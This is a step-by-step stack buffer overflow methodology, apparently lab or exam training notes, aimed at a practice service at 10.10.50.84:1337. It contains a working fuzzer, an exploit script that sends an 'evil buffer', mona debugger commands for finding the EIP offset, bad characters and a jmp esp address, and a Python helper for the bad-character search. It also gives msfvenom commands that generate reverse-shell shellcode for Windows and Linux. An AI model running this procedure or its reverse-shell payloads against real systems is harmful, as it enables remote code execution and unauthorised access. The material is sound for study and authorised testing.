# Buffer Overflow Methodology

### 1. Fuzz application to find number of bytes needed to crash the application

{% code title="fuzzer.py" %}

```python
import socket, time, sys

ip = "10.10.50.84"
port = 1337

timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)  # read the banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)  # times out once the service has crashed
  except OSError:  # connection refused or timed out: the service is down
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"  # grow the buffer by 100 bytes each round
  time.sleep(1)
```

{% endcode %}

### 2. Set mona configuration

```
!mona config -set workingfolder c:\mona\%p
```

### 3. Find `EIP` offset

{% code title="exploit.py" %}

```python
import socket

ip = "10.10.50.84"
port = 1337

prefix = "OVERFLOW2 "  # optional: the command the service expects in front of the data
eip_offset = 0  # number of bytes sent before EIP is overwritten (step 3)
overflow = "A" * eip_offset
retn = ""  # jmp esp address, written little-endian: 0x625011af becomes "\xaf\x11\x50\x62"
padding = ""  # nop sled (step 7)
payload = ""  # shellcode from msfvenom (step 6)
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
  try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
  except OSError:
    print("Could not connect.")
```

{% endcode %}

### 4. Find bad characters

* Generate a byte array of every value from `\x00` to `\xff`, leaving out the bad characters already known (start with the null byte): `!mona bytearray -b "\x00"`. Paste the generated string into `payload` in `exploit.py` and crash the service with it.
* Compare the bytes that landed in memory (the address `ESP` points to at the crash, given after `-a`) with the file to find the next bad character: `!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>`
* Repeat both steps, adding each byte found to `-b`, until the compare reports no corruption.
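The little-endian packing noted in the `exploit.py` comment and the bytearray/compare loop from step 4, as an added Python example that is not part of the original page or of mona; `fake_target` is a constructed stand-in for the crashed process's memory, and its bad characters (`0x00` and `0x0a`) are invented for the example:

```python
import struct


def pack_retn(address):
    # Pack a 32-bit return address little-endian, so 0x625011af becomes \xaf\x11\x50\x62.
    return struct.pack("<I", address)


def build_bytearray(bad_chars):
    # Same idea as `!mona bytearray -b ...`: every byte value 0x01..0xff minus the known bad chars.
    return bytes(b for b in range(1, 256) if b not in bad_chars)


def first_corruption(sent, dumped):
    # Same idea as `!mona compare`: walk the sent array alongside what actually landed in memory
    # and return the first sent byte that was altered or dropped, or None if the two match.
    for i, expected in enumerate(sent):
        if i >= len(dumped) or dumped[i] != expected:
            return expected
    return None


def find_bad_chars(send_and_dump, known=(0x00,)):
    # Repeat bytearray/compare until the dump matches, accumulating the bad characters found.
    # `send_and_dump` takes the array to send and returns the bytes seen in memory after the crash.
    bad = set(known)
    while True:
        sent = build_bytearray(bad)
        corrupt = first_corruption(sent, send_and_dump(sent))
        if corrupt is None:
            return sorted(bad)
        bad.add(corrupt)


def fake_target(data):
    # Constructed stand-in for the crashed process's stack: this hypothetical service truncates
    # at a null byte and strips line feeds, so 0x00 and 0x0a are its bad characters.
    data = data.split(b"\x00")[0]
    return data.replace(b"\x0a", b"")


if __name__ == "__main__":
    print("retn:", pack_retn(0x625011af))
    print("bad chars:", [hex(b) for b in find_bad_chars(fake_target)])
```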

### 5. Find a `jmp esp` instruction whose address contains no bad characters

List the bad characters found in step 4 after the `-cpb` flag.

`!mona jmp -r esp -cpb "\x00"`

### 6. Generate shellcode

List the bad characters found in step 4 after the `-b` flag.

* Windows - `msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c`
* Linux - `msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c`

### 7. Set a `nop` sled in `padding`

Place the sled in `padding`, in front of the shellcode, so the decoder stub of the encoded payload has working room:

`"\x90" * 24`
